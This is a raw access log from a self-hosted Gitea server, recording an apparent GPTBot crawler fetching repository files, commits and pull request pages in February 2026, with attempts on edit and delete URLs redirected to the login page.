"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:17:22:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make?display=rendered" [Client 74.7.227.38] [Length 11169] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:17:22:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor.py?display=source" [Client 74.7.227.38] [Length 20311] [Gzip 6.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor.py" -[17/Feb/2026:17:22:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 9978] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls" -[17/Feb/2026:17:22:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 9978] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls" -[17/Feb/2026:17:22:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc?display=rendered" [Client 74.7.227.38] [Length 11008] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:17:22:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/GoldMonitor_KRX.py" [Client 74.7.227.38] [Length 5792] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_KRX.py" -[17/Feb/2026:17:22:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10066] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:17:22:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11073] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:17:22:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out?display=rendered" [Client 74.7.227.38] [Length 11069] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:17:22:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make?display=rendered" [Client 74.7.227.38] [Length 11156] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:17:22:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make?display=source" [Client 74.7.227.38] [Length 11348] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:17:22:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make?display=source" [Client 74.7.227.38] [Length 11349] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:17:22:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make?display=rendered" [Client 74.7.227.38] [Length 11155] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:17:22:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11074] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:17:22:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 17546] [Gzip 2.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest" -[17/Feb/2026:17:22:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/gold_monitor_full.py" [Client 74.7.227.38] [Length 21139] [Gzip 10.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor_full.py" -[17/Feb/2026:17:22:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor_full.spec" [Client 74.7.227.38] [Length 12466] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" -[17/Feb/2026:17:22:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 11366] [Gzip 4.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:17:22:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 11366] [Gzip 4.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:17:22:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 11368] [Gzip 4.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:17:22:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10169] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=oldest&state=all&type=all" -[17/Feb/2026:17:22:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/TestService.csproj?display=source" [Client 74.7.227.38] [Length 11766] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/TestService.csproj" -[17/Feb/2026:17:22:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10910] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/.gitignore" -[17/Feb/2026:17:22:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10909] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/.gitignore" -[17/Feb/2026:17:22:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/README.md?display=source" [Client 74.7.227.38] [Length 20818] [Gzip 5.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/README.md" -[17/Feb/2026:17:22:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/Gitea_Manual.md" -[17/Feb/2026:17:22:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PythonTest/Gitea_Manual.md" -[17/Feb/2026:17:22:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/gold_monitor_full.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/gold_monitor_full.py" -[17/Feb/2026:17:22:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/gold_monitor_full.py" -[17/Feb/2026:17:22:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/gold_monitor_full.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/gold_monitor_full.py" -[17/Feb/2026:17:22:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/gold_monitor_full.py" -[17/Feb/2026:17:22:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/gold_monitor_full.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor_full.spec" -[17/Feb/2026:17:22:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/gold_monitor_full.spec" -[17/Feb/2026:17:22:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/gold_monitor_full.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor_full.spec" -[17/Feb/2026:17:22:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/gold_monitor_full.spec" -[17/Feb/2026:17:22:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/Gitea_Manual.md" -[17/Feb/2026:17:22:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PythonTest/Gitea_Manual.md" -[17/Feb/2026:17:22:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/gold_monitor_full.spec" [Client 74.7.227.38] [Length 9790] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor_full.spec" -[17/Feb/2026:17:22:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 9809] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/Gitea_Manual.md" -[17/Feb/2026:17:22:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/gold_monitor_full.spec" [Client 74.7.227.38] [Length 878] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor_full.spec" -[17/Feb/2026:17:22:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/gold_monitor_full.spec" [Client 74.7.227.38] [Length 708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor_full.spec" -[17/Feb/2026:17:22:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 877] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/Gitea_Manual.md" -[17/Feb/2026:17:22:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 11904] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/Gitea_Manual.md" -[17/Feb/2026:17:22:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol.exe?display=rendered" [Client 74.7.227.38] [Length 10864] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol.exe" -[17/Feb/2026:17:22:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/appsettings.json?display=rendered" [Client 74.7.227.38] [Length 11151] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/appsettings.json" -[17/Feb/2026:17:22:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2fobj%2fOpcUaMinimal.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 21728] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" -[17/Feb/2026:17:22:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2fobj%2fOpcUaMinimal.csproj.nuget.g.props" [Client 74.7.227.38] [Length 22029] [Gzip 3.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" -[17/Feb/2026:17:22:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9954] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=farduedate&state=open&type=all" -[17/Feb/2026:17:22:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog.service?display=source" [Client 74.7.227.38] [Length 12604] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog.service" -[17/Feb/2026:17:22:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9977] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:17:22:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/main.py?display=source" [Client 74.7.227.38] [Length 19750] [Gzip 5.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/main.py" -[17/Feb/2026:17:22:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/main.py?display=source" [Client 74.7.227.38] [Length 19747] [Gzip 5.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/main.py" -[17/Feb/2026:17:22:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/main.py?display=source" [Client 74.7.227.38] [Length 19749] [Gzip 5.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/main.py" -[17/Feb/2026:17:22:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/main.py?display=rendered" [Client 74.7.227.38] [Length 10914] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/main.py" -[17/Feb/2026:17:22:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/main.py?display=rendered" [Client 74.7.227.38] [Length 10916] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/main.py" -[17/Feb/2026:17:22:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/main.py?display=rendered" [Client 74.7.227.38] [Length 10917] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/main.py" -[17/Feb/2026:17:22:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr 